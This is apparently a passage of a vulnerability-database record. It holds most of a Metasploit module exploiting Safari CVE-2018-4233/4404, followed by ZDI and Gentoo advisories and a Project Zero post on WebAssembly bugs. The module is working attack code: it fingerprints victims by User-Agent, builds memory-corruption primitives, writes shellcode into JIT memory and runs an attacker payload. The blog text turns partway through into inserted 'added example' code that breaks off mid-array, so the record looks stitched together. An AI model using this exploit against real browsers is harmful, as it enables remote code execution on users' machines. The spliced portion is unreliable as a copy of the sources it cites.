OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n :jsc_vtab => '0x0000d8d8',\n :dyld_stub_loader => '0x00001168',\n :dlopen => '0x000027f7',\n :confstr => '0x00002c84',\n :strlen => '0x00001b40',\n :strlen_got => '0xdc0',\n },\n '10.13' => {\n :jsc_vtab => '0x0000e5f8',\n :dyld_stub_loader => '0x000012a8',\n :dlopen => '0x00002e60',\n :confstr => '0x000024fc',\n :strlen => '0x00001440',\n :strlen_got => '0xee8',\n },\n '10.13.3' => {\n :jsc_vtab => '0xe5e8',\n :dyld_stub_loader => '0x1278',\n :dlopen => '0x2e30',\n :confstr => '0x24dc',\n :strlen => '0x1420',\n :strlen_got => '0xee0',\n },\n }\n end\n\n def stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", 
\"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n osx_version = $1.gsub(\"_\", \".\")\n if user_agent =~ /Version\\/(.*?) /\n if Gem::Version.new($1) >= Gem::Version.new('11.1.1')\n print_warning \"Safari version #{$1} is not vulnerable\"\n return false\n else\n print_good \"Safari version #{$1} appears to be vulnerable\"\n end\n end\n mac_osx_version = Gem::Version.new(osx_version)\n if mac_osx_version >= Gem::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Gem::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(osx_version)\n offset = offset_table[osx_version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = function(oldVal, newVal) {\n for (var idx = 0; idx < 
this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n };\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; 
i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL SECTION\n 
///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n 
driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new 
Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] 
Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed successfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initialization failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb"}], "zdi": [{"lastseen": "2020-06-22T11:42:20", "bulletinFamily": "info", "cvelist": ["CVE-2018-4199"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of SVG elements. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. 
An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-07-26T00:00:00", "id": "ZDI-18-781", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-781/", "title": "(Pwn2Own) Apple Safari SVG Heap-based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:40:08", "bulletinFamily": "info", "cvelist": ["CVE-2018-4233"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JIT. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-10-30T00:00:00", "id": "ZDI-18-1321", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-1321/", "title": "(Pwn2Own) Apple Safari CreateThis Type Confusion Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-08-23T00:25:34", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4119", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2018-4270", "CVE-2018-12294", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-4120", "CVE-2018-4266", "CVE-2018-4272", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4264", "CVE-2018-4261", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2018-12293", "CVE-2018-4125", "CVE-2018-4267", "CVE-2018-4233", "CVE-2018-4273", "CVE-2018-4113", 
"CVE-2018-4222", "CVE-2018-4127", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4278", "CVE-2018-4218", "CVE-2018-4263", "CVE-2018-4214", "CVE-2018-4284", "CVE-2018-4117", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4265", "CVE-2018-4200", "CVE-2018-4121", "CVE-2018-4262"], "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary commands or cause a denial of service condition via maliciously crafted web content. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebkitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.20.4\"", "edition": 1, "modified": "2018-08-22T00:00:00", "published": "2018-08-22T00:00:00", "id": "GLSA-201808-04", "href": "https://security.gentoo.org/glsa/201808-04", "title": "WebkitGTK+: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:46", "bulletinFamily": "info", "cvelist": ["CVE-2018-4121", "CVE-2018-4222", "CVE-2018-5093", "CVE-2018-6092"], "description": "Posted by Natalie Silvanovich, Project Zero \n \nWebAssembly is a format that allows code written in assembly-like instructions to be run from JavaScript. It has recently been implemented in all four major browsers. We reviewed each browser\u2019s WebAssembly implementation and found three vulnerabilities. 
This blog post gives an overview of the features and attack surface of WebAssembly, as well as the vulnerabilities we found.\n\n### Building WebAssembly\n\nA number of tools can be used to write WebAssembly code. An important [goal](<http://webassembly.org/docs/high-level-goals/>) of the designers of the format is to be able to compile C and C++ into WebAssembly, and compilers exist to do so. It is likely that other languages will compile into WebAssembly in the future. It is also possible to write WebAssembly in [WebAssembly text format](<https://webassembly.github.io/spec/core/text/index.html>), which is a direct text representation of [WebAssembly binary format](<https://webassembly.github.io/spec/core/binary/index.html>), the final format of all WebAssembly code.\n\n### WebAssembly Modules\n\nCode in WebAssembly binary format starts off in an ArrayBuffer or TypedArray in JavaScript. It is then loaded into a WebAssembly Module.\n\n    var code = new ArrayBuffer(len);\n    \u2026 // write code into ArrayBuffer\n    var m = new WebAssembly.Module(code);\n\nA module is an object that contains the code and initialization information specified by the bytes in binary format. When a module is created, it parses the binary, loads needed information into the module, and then translates the WebAssembly instructions into an intermediate bytecode. Verification of the WebAssembly instructions is performed during this translation.\n\nWebAssembly binaries consist of a series of sections (binary blobs) with different lengths and types. The sections supported by WebAssembly binary format are as follows.\n\n| Section | Code | Description |\n|---|---|---|\n| Type | 1 | Contains a list of function signatures used by functions defined and called by the module. Each signature has an index, and can be used by multiple functions by specifying that index. |\n
| Imports | 2 | Contains the names and types of objects to be imported. More on this later. |\n| Functions | 3 | The declarations (including the index of a signature specified in the Type Section) of the functions defined in this module. |\n| Table | 4 | Contains details about function tables. More on this later. |\n| Memory | 5 | Contains details about memory. More on this later. |\n| Global | 6 | Global declarations. |\n| Exports | 7 | Contains the names and types of objects and functions that will be exported. |\n| Start | 8 | Specifies a function that will be called on Module start-up. |\n| Elements | 9 | Table initialization information. |\n| Code | 10 | The WebAssembly instructions that make up the body of each function. |\n| Data | 11 | Memory initialization information. |\n\nIf a section has a code that is not specified in the above table, it is called a custom section. Some browsers use custom sections to implement upcoming or experimental features. Unrecognized custom sections are skipped when loading a Module, and can be accessed as TypedArrays in JavaScript.\n\nModule loading starts off by parsing the module. This involves going through each section, verifying its format and then loading the needed information into a native structure inside the WebAssembly engine. Most of the bugs that Project Zero found in WebAssembly occurred in this phase.\n\nTo start, [CVE-2018-4222](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1545>) occurs when the WebAssembly binary is read out of the buffer containing it. TypedArray objects in JavaScript can contain offsets at which their underlying ArrayBuffers are accessed. The WebKit implementation of this added the offset to the ArrayBuffer data pointer twice. 
So the following code:\n\n    var b2 = new ArrayBuffer(1000);\n    var view = new Int8Array(b2, 700); // offset\n    var mod = new WebAssembly.Module(view);\n\nwill read memory out-of-bounds in an unfixed version of WebKit. Note that this is also a functional error, as it prevents any TypedArray with an offset from being processed correctly by WebAssembly.\n\n[CVE-2018-6092](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1546>) in Chrome is an example of an issue that occurs when parsing a WebAssembly buffer. [Similar](<https://bugs.chromium.org/p/chromium/issues/detail?id=737069>) [issues](<https://bugs.chromium.org/p/chromium/issues/detail?id=647329>) [have](<https://bugs.chromium.org/p/chromium/issues/detail?id=789952>) been fixed in the past. In this vulnerability, there is an integer overflow when parsing the locals of a function specified in the code section of the binary. The numbers of locals of each type are added together, and the size_t that contains this sum can wrap on a 32-bit platform.\n\nIt is also evident from the section table above (and specified in the WebAssembly standard) that sections must be unique and in the correct order. For example, the function section can\u2019t load unless the type section containing the signatures it needs has been loaded already. \n\n[CVE-2018-4121](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1546>) is an error in section order checking in WebKit. In unfixed versions of WebKit, the order check gets reset after a custom section is processed, basically allowing sections to occur any number of times in any order. This leads to an overflow in several vectors in WebKit, as its parsing implementation allocates memory based on the assumption that there is only one of each section, and then adds elements to the memory without checking. 
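The three parsing issues described above (the TypedArray offset applied twice in CVE-2018-4222, the wrapped locals sum in CVE-2018-6092, and the order check reset by a custom section in CVE-2018-4121) all come down to checks a section walker must get right. What follows is an added example, not code from the Project Zero post, from WebKit or from V8: a small JavaScript walker over a module's section headers with those checks in place, a flag that reproduces the order-reset bug so the two behaviours can be compared, and hand-constructed sample binaries. The `MAX_LOCALS` cap of 50000 is an assumed value for the demonstration, not a figure taken from any engine, and the module is placed in a `Uint8Array` view rather than the post's `Int8Array`.

```javascript
'use strict';
// Added example (not code from the Project Zero post, WebKit or V8): a minimal
// walker over WebAssembly section headers applying the checks the post describes.

const WASM_HEADER = [0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00];  // "\0asm" + version 1
const LAST_KNOWN_SECTION_ID = 11;   // Data section
const MAX_LOCALS = 50000;           // assumed cap for this example, not an engine's value

// Unsigned LEB128 decode; arithmetic rather than bitwise ops so a 5-byte value cannot wrap.
function readVarU32(bytes, pos) {
  let result = 0, shift = 0;
  for (;;) {
    if (pos >= bytes.length) throw new RangeError('truncated LEB128');
    const b = bytes[pos++];
    result += (b & 0x7f) * 2 ** shift;
    if ((b & 0x80) === 0) break;
    shift += 7;
    if (shift > 28) throw new RangeError('LEB128 too long for u32');
  }
  if (result > 0xffffffff) throw new RangeError('u32 overflow');
  return { value: result, pos };
}

// Walks the section headers of a module held in a Uint8Array view. Indexing the view
// applies its byteOffset exactly once (CVE-2018-4222 applied it twice). Known sections
// must appear at most once, in increasing id order; custom sections (id 0) may appear
// anywhere and must not touch that state. `resetAfterCustom` reproduces CVE-2018-4121.
function walkSections(view, { resetAfterCustom = false } = {}) {
  if (!(view instanceof Uint8Array)) throw new TypeError('expected a Uint8Array view');
  if (view.length < 8) throw new RangeError('too short for a module header');
  for (let i = 0; i < 8; i++) if (view[i] !== WASM_HEADER[i]) throw new Error('bad magic or version');
  const sections = [];
  let pos = 8;
  let lastKnownId = 0;
  while (pos < view.length) {
    const id = view[pos++];
    const size = readVarU32(view, pos);
    pos = size.pos;
    if (pos + size.value > view.length) throw new RangeError(`section ${id} overruns the buffer`);
    if (id === 0) {
      if (resetAfterCustom) lastKnownId = 0;   // the bug: order state forgotten
    } else {
      if (id > LAST_KNOWN_SECTION_ID) throw new Error(`unknown section id ${id}`);
      if (id <= lastKnownId) throw new Error(`section ${id} duplicated or out of order`);
      lastKnownId = id;
    }
    sections.push({ id, offset: pos, size: size.value });
    pos += size.value;
  }
  return sections;
}

// Decodes the locals vector at the start of a function body (`pos` points at it) and adds
// the per-type counts against a cap, the check whose absence let the sum wrap in CVE-2018-6092.
function countLocals(bytes, pos) {
  const groups = readVarU32(bytes, pos);
  pos = groups.pos;
  let total = 0;
  for (let i = 0; i < groups.value; i++) {
    const count = readVarU32(bytes, pos);
    pos = count.pos + 1;   // skip the value-type byte
    if (count.value > MAX_LOCALS - total) throw new RangeError('too many locals');
    total += count.value;
  }
  return total;
}

// Helpers to build the constructed sample binaries.
function encodeVarU32(n) {
  const out = [];
  do { let b = n % 128; n = Math.floor(n / 128); if (n) b |= 0x80; out.push(b); } while (n);
  return out;
}
const section = (id, payload) => [id, ...encodeVarU32(payload.length), ...payload];
const custom = section(0, [4, 0x74, 0x65, 0x73, 0x74]);   // custom section named "test"
const GOOD = Uint8Array.from([...WASM_HEADER, ...section(1, [0]), ...custom, ...section(3, [0])]);
const DUP_AFTER_CUSTOM = Uint8Array.from([...WASM_HEADER, ...section(1, [0]), ...custom, ...section(1, [0])]);

// Places a module at `offset` inside a larger ArrayBuffer, like the post's `new Int8Array(b2, 700)`.
function placeAtOffset(moduleBytes, offset) {
  const backing = new ArrayBuffer(offset + moduleBytes.length + 16);
  new Uint8Array(backing).fill(0xff);   // junk around the module
  new Uint8Array(backing, offset).set(moduleBytes);
  return new Uint8Array(backing, offset, moduleBytes.length);
}

// Emulates the double-offset mistake: adding byteOffset a second time lands outside the buffer.
function viewWithDoubledOffset(view) {
  return new Uint8Array(view.buffer, view.byteOffset * 2, view.byteLength);
}

const sectionIds = (view, opts) => walkSections(view, opts).map((s) => s.id);
```

Run under Node. `sectionIds(placeAtOffset(GOOD, 700))` returns `[1, 0, 3]` because the view is indexed directly and the offset is applied once; `viewWithDoubledOffset` on the same view throws a RangeError, which is the JavaScript-level equivalent of the out-of-bounds read the native code performed. `sectionIds(DUP_AFTER_CUSTOM)` rejects the second Type section, while the same call with `{ resetAfterCustom: true }` accepts it and returns `[1, 0, 1]`, the acceptance that let WebKit allocate for one section and then append a second.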
Even without this implementation detail, though, this bug would likely lead to many subtle memory corruption issues in the WebAssembly engine, as the order and non-duplicate nature of WebAssembly binary sections is very fundamental to the functionality of WebAssembly.

This vulnerability was independently discovered by Alex Plaskett, Fabian Beterke and Georgi Geshev of MWR Labs, and they describe their exploit [here](<https://labs.mwrinfosecurity.com/assets/BlogFiles/apple-safari-wasm-section-vuln-write-up-2018-04-16.pdf>).

### WebAssembly Instances

After a binary is loaded into a Module, an Instance of the module needs to be created to run the code. An Instance binds the code to imported objects it needs to run, and does some final initialization.

```javascript
var code = new ArrayBuffer(len);
// … write code into ArrayBuffer
var m = new WebAssembly.Module(code);
var i = new WebAssembly.Instance(m, imports);
```

Each module has an Import Section it loaded from the WebAssembly binary. This section contains the names and types of objects that must be imported from JavaScript for the code in the module to run. There are four types of object that can be imported. Functions (JavaScript or WebAssembly) can be imported and called from WebAssembly. Numeric types can also be imported from JavaScript to populate globals.

Memory and Table objects are the final two types that can be imported. These are new object types added to JavaScript engines for use in WebAssembly. Memory objects contain the memory used by the WebAssembly code. This memory can be accessed in JavaScript via an ArrayBuffer, and in WebAssembly via load and store instructions. When creating a Memory object, the WebAssembly developer specifies the initial and optional maximum size of the memory.
The Memory object is then created with the initial memory size allocated, and the allocated memory size can be increased in JavaScript by calling the grow method, and in WebAssembly using the grow instruction. Memory size can never decrease (at least according to the standard).

Table objects are function tables for WebAssembly. They contain function objects at specific indexes in the table, and these functions can be called from WebAssembly using the call_indirect instruction. Like memory, tables have an initial and optional maximum size, and their size can be expanded by calling the grow method in JavaScript. Table objects cannot be expanded in WebAssembly. Table objects can only contain WebAssembly functions, not JavaScript functions, and an exception is thrown if the wrong type of function is added to a Table object. Currently, WebAssembly only supports one Memory object and one Table object per Instance object. This is likely to change in the future though.

More than one Instance object can share the same Memory object and Table object. If two or more Instance objects share both of these objects, they are referred to as being in the same compartment. It is possible to create Instance objects that share a Table object, but not a Memory object, or vice versa, but no compiler should ever create Instances with this property. No compiler ever changes the values in a table after it is initialized, and this is likely to remain true in the future, but it is still possible for JavaScript callers to change them at any time.

There are two ways to add Memory and Table objects to an Instance object. The first is through the Import Section as mentioned above. The second way is to include a Memory or Table Section in the binary. Including these sections causes the WebAssembly engine to create the needed Memory or Table object for the module, with parameters provided in the binary.
It is not valid to specify these objects in both the Import Section and the Table or Memory Section, as this would mean there is more than one of each object, which is not currently allowed. Memory and Table objects are not mandatory, and it is fairly common for code in WebAssembly not to have a Table object. It is also possible to create WebAssembly code that does not have a Memory object, for example a function that averages the parameters that are passed in, but this is rare in practice.

One feature of these objects that has led to several vulnerabilities is the ability to increase the size of the allocated Memory or Table object. For example, [CVE-2018-5093](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-02/#>), a series of integer overflow vulnerabilities in increasing the size of Memory and Table objects, was recently found by [OSS-Fuzz](<https://opensource.google.com/projects/oss-fuzz>). A similar [issue](<https://bugs.chromium.org/p/chromium/issues/detail?id=772056>) was found in Chrome by OSS-Fuzz.

Another question that immediately comes to mind about Memory objects is whether the internal ArrayBuffer can be detached, as many vulnerabilities have occurred in ArrayBuffer detachment. According to the specification, Memory object ArrayBuffers cannot be detached by script, and this is true in all browsers except for Microsoft Edge (Chakra does not allow this, but Edge does). The Memory object ArrayBuffers also do not change size when the Memory object is expanded. Instead, they are detached as soon as the grow method is called. This prevents any bugs that could occur due to ArrayBuffers changing size.

Out of bounds access is always a concern when allowing script to use memory, but these types of issues are fairly uncommon in WebAssembly.
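As an added example (not from the original post), the following hand-assembled module, constructed here for the demo, exports one linear memory (initial 1 page, maximum 2) and a function `load(addr)` that performs an `i32.load` at `addr`. Running it in Node.js shows the behaviour just described: an access that crosses the end of the allocated memory traps instead of reading outside the buffer, the old ArrayBuffer is detached as soon as `grow` is called, and growing past the declared maximum is refused.

```javascript
// Constructed module, hand-assembled for this example (not from the post):
//   (memory (export "mem") 1 2)
//   (func (export "load") (param i32) (result i32) local.get 0 i32.load)
const WASM_MEMORY_MODULE = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,   // magic + version
  0x01, 0x06, 0x01, 0x60, 0x01, 0x7f, 0x01, 0x7f,   // type 0: (i32) -> i32
  0x03, 0x02, 0x01, 0x00,                           // one function of type 0
  0x05, 0x04, 0x01, 0x01, 0x01, 0x02,               // memory: min 1 page, max 2 pages
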